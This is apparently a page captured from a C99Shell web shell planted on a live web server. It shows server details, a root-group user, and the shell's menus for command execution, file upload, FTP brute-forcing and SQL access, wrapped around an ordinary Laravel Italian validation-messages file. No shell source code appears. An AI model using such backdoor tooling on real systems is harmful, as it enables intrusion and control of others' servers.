!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/lang/it/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     validation.php (9.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

return array (
  
'accepted' => 'Il campo :attribute deve essere accettato.',
  
'accepted_if' => 'Il campo :attribute deve essere accettato quando :other è :value.',
  
'active_url' => 'Il campo :attribute non contiene un URL valido.',
  
'after' => 'Il campo :attribute deve essere una data successiva a :date.',
  
'after_or_equal' => 'Il campo :attribute deve essere una data successiva o uguale a :date.',
  
'alpha' => 'Il campo :attribute può contenere solo lettere.',
  
'alpha_dash' => 'Il campo :attribute può contenere solo lettere, numeri, trattini e underscore.',
  
'alpha_num' => 'Il campo :attribute può contenere solo lettere e numeri.',
  
'array' => 'Il campo :attribute deve essere un array.',
  
'ascii' => 'Il campo :attribute deve contenere solo caratteri alfanumerici e simboli a byte singolo.',
  
'before' => 'Il campo :attribute deve essere una data precedente a :date.',
  
'before_or_equal' => 'Il campo :attribute deve essere una data precedente o uguale a :date.',
  
'between' => 
  array (
    
'array' => 'Il campo :attribute deve contenere tra :min e :max elementi.',
    
'file' => 'Il campo :attribute deve essere compreso tra :min e :max kilobytes.',
    
'numeric' => 'Il campo :attribute deve essere compreso tra :min e :max.',
    
'string' => 'Il campo :attribute deve contenere tra :min e :max caratteri.',
  ),
  
'boolean' => 'Il campo :attribute deve essere vero o falso.',
  
'can' => 'Il campo :attribute contiene un valore non autorizzato.',
  
'confirmed' => 'La conferma del campo :attribute non corrisponde.',
  
'current_password' => 'La password non è corretta.',
  
'date' => 'Il campo :attribute non contiene una data valida.',
  
'date_equals' => 'Il campo :attribute deve essere una data uguale a :date.',
  
'date_format' => 'Il campo :attribute non corrisponde al formato :format.',
  
'decimal' => 'Il campo :attribute deve avere :decimal decimali.',
  
'declined' => 'Il campo :attribute deve essere rifiutato.',
  
'declined_if' => 'Il campo :attribute deve essere rifiutato quando :other è :value.',
  
'different' => 'I campi :attribute e :other devono essere diversi.',
  
'digits' => 'Il campo :attribute deve essere di :digits cifre.',
  
'digits_between' => 'Il campo :attribute deve essere compreso tra :min e :max cifre.',
  
'dimensions' => 'Le dimensioni dell\'immagine :attribute non sono valide.',
  
'distinct' => 'Il campo :attribute contiene un valore duplicato.',
  
'doesnt_end_with' => 'Il campo :attribute non deve terminare con uno dei seguenti valori: :values.',
  
'doesnt_start_with' => 'Il campo :attribute non deve iniziare con uno dei seguenti valori: :values.',
  
'email' => 'Il campo :attribute deve essere un indirizzo email valido.',
  
'ends_with' => 'Il campo :attribute deve terminare con uno dei seguenti valori: :values.',
  
'enum' => 'Il valore selezionato per :attribute non è valido.',
  
'exists' => 'Il valore selezionato per :attribute non è valido.',
  
'extensions' => 'Il campo :attribute deve avere una delle seguenti estensioni: :values.',
  
'file' => 'Il campo :attribute deve essere un file.',
  
'filled' => 'Il campo :attribute deve contenere un valore.',
  
'gt' => 
  array (
    
'array' => 'Il campo :attribute deve contenere più di :value elementi.',
    
'file' => 'Il campo :attribute deve essere maggiore di :value kilobytes.',
    
'numeric' => 'Il campo :attribute deve essere maggiore di :value.',
    
'string' => 'Il campo :attribute deve contenere più di :value caratteri.',
  ),
  
'gte' => 
  array (
    
'array' => 'Il campo :attribute deve contenere almeno :value elementi.',
    
'file' => 'Il campo :attribute deve essere maggiore o uguale a :value kilobytes.',
    
'numeric' => 'Il campo :attribute deve essere maggiore o uguale a :value.',
    
'string' => 'Il campo :attribute deve contenere almeno :value caratteri.',
  ),
  
'hex_color' => 'Il campo :attribute deve essere un colore esadecimale valido.',
  
'image' => 'Il campo :attribute deve essere un\'immagine.',
  
'in' => 'Il valore selezionato per :attribute non è valido.',
  
'in_array' => 'Il campo :attribute non esiste in :other.',
  
'integer' => 'Il campo :attribute deve essere un numero intero.',
  
'ip' => 'Il campo :attribute deve essere un indirizzo IP valido.',
  
'ipv4' => 'Il campo :attribute deve essere un indirizzo IPv4 valido.',
  
'ipv6' => 'Il campo :attribute deve essere un indirizzo IPv6 valido.',
  
'json' => 'Il campo :attribute deve essere una stringa JSON valida.',
  
'lowercase' => 'Il campo :attribute deve essere minuscolo.',
  
'lt' => 
  array (
    
'array' => 'Il campo :attribute deve contenere meno di :value elementi.',
    
'file' => 'Il campo :attribute deve essere minore di :value kilobytes.',
    
'numeric' => 'Il campo :attribute deve essere minore di :value.',
    
'string' => 'Il campo :attribute deve contenere meno di :value caratteri.',
  ),
  
'lte' => 
  array (
    
'array' => 'Il campo :attribute non deve contenere più di :value elementi.',
    
'file' => 'Il campo :attribute deve essere minore o uguale a :value kilobytes.',
    
'numeric' => 'Il campo :attribute deve essere minore o uguale a :value.',
    
'string' => 'Il campo :attribute deve contenere al massimo :value caratteri.',
  ),
  
'mac_address' => 'Il campo :attribute deve essere un indirizzo MAC valido.',
  
'max' => 
  array (
    
'array' => 'Il campo :attribute non può contenere più di :max elementi.',
    
'file' => 'Il campo :attribute non può superare :max kilobytes.',
    
'numeric' => 'Il campo :attribute non può essere superiore a :max.',
    
'string' => 'Il campo :attribute non può contenere più di :max caratteri.',
  ),
  
'max_digits' => 'Il campo :attribute non deve avere più di :max cifre.',
  
'mimes' => 'Il campo :attribute deve essere un file di tipo: :values.',
  
'mimetypes' => 'Il campo :attribute deve essere un file di tipo: :values.',
  
'min' => 
  array (
    
'array' => 'Il campo :attribute deve contenere almeno :min elementi.',
    
'file' => 'Il campo :attribute deve essere almeno di :min kilobytes.',
    
'numeric' => 'Il campo :attribute deve essere almeno :min.',
    
'string' => 'Il campo :attribute deve contenere almeno :min caratteri.',
  ),
  
'min_digits' => 'Il campo :attribute deve avere almeno :min cifre.',
  
'missing' => 'Il campo :attribute deve essere mancante.',
  
'missing_if' => 'Il campo :attribute deve essere mancante quando :other è :value.',
  
'missing_unless' => 'Il campo :attribute deve essere mancante a meno che :other non sia :value.',
  
'missing_with' => 'Il campo :attribute deve essere mancante quando :values è presente.',
  
'missing_with_all' => 'Il campo :attribute deve essere mancante quando :values sono presenti.',
  
'multiple_of' => 'Il campo :attribute deve essere un multiplo di :value.',
  
'not_in' => 'Il valore selezionato per :attribute non è valido.',
  
'not_regex' => 'Il formato del campo :attribute non è valido.',
  
'numeric' => 'Il campo :attribute deve essere un numero.',
  
'password' => 'La password non è corretta.',
  
'present' => 'Il campo :attribute deve essere presente.',
  
'present_if' => 'Il campo :attribute deve essere presente quando :other è :value.',
  
'present_unless' => 'Il campo :attribute deve essere presente a meno che :other non sia :value.',
  
'present_with' => 'Il campo :attribute deve essere presente quando :values è presente.',
  
'present_with_all' => 'Il campo :attribute deve essere presente quando :values sono presenti.',
  
'prohibited' => 'Il campo :attribute non è consentito.',
  
'prohibited_if' => 'Il campo :attribute non è consentito quando :other è :value.',
  
'prohibited_unless' => 'Il campo :attribute non è consentito a meno che :other non sia in :values.',
  
'prohibits' => 'Il campo :attribute non consente la presenza di :other.',
  
'regex' => 'Il formato del campo :attribute non è valido.',
  
'required' => 'Il campo :attribute è obbligatorio.',
  
'required_array_keys' => 'Il campo :attribute deve contenere voci per: :values.',
  
'required_if' => 'Il campo :attribute è obbligatorio quando :other è :value.',
  
'required_if_accepted' => 'Il campo :attribute è obbligatorio quando :other è accettato.',
  
'required_unless' => 'Il campo :attribute è obbligatorio a meno che :other non sia in :values.',
  
'required_with' => 'Il campo :attribute è obbligatorio quando :values è presente.',
  
'required_with_all' => 'Il campo :attribute è obbligatorio quando :values sono presenti.',
  
'required_without' => 'Il campo :attribute è obbligatorio quando :values non è presente.',
  
'required_without_all' => 'Il campo :attribute è obbligatorio quando nessuno di :values è presente.',
  
'same' => 'I campi :attribute e :other devono corrispondere.',
  
'size' => 
  array (
    
'array' => 'Il campo :attribute deve contenere :size elementi.',
    
'file' => 'Il campo :attribute deve essere di :size kilobytes.',
    
'numeric' => 'Il campo :attribute deve essere :size.',
    
'string' => 'Il campo :attribute deve essere di :size caratteri.',
  ),
  
'starts_with' => 'Il campo :attribute deve iniziare con uno dei seguenti valori: :values.',
  
'string' => 'Il campo :attribute deve essere una stringa.',
  
'timezone' => 'Il campo :attribute deve essere un fuso orario valido.',
  
'unique' => 'Il valore del campo :attribute è già stato utilizzato.',
  
'uploaded' => 'Il caricamento del campo :attribute è fallito.',
  
'uppercase' => 'Il campo :attribute deve essere maiuscolo.',
  
'url' => 'Il formato del campo :attribute non è valido.',
  
'ulid' => 'Il campo :attribute deve essere un ULID valido.',
  
'uuid' => 'Il campo :attribute deve essere un UUID valido.',
  
'custom' => 
  array (
    
'attribute-name' => 
    array (
      
'rule-name' => 'messaggio-personalizzato',
    ),
  ),
);

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--